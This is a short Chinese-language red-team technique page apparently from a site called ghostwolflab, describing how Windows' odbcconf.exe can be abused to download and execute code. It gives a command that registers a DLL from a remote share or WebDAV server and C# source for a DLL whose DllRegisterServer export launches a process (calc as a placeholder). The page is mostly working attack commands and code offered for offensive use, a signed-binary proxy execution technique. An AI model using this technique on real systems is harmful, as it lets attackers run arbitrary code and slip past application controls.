ODBC

11 months ago

red.ghostwolflab.com

1 minute

ODBC是一种用于连接不同类型的数据库的标准接口，它可以让应用程序无需修改代码就可以访问多种数据源。

下载文件

odbcconf /s /a {regsvr \\webserver\\payload.dll}

代码执行

使用odbcconf.exe下载并执行任意代码。

odbcconf.cs：

/*
To use with odbcconf.exe:
odbcconf /S /A {REGSVR odbcconf.dll}
or, from a remote location (if WebDAV support enabled):
odbcconf /S /A {REGSVR \\webdavaserver\dir\odbcconf.dll}
*/

using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;

namespace odbcconf
{
    public class RegSvr
    {

        [DllExport("DllRegisterServer", CallingConvention = CallingConvention.StdCall)]
        public static bool DllRegisterServer()
        {
            Process proc = Process.Start(new ProcessStartInfo { FileName = "calc" });
            return true;
        }
    }
}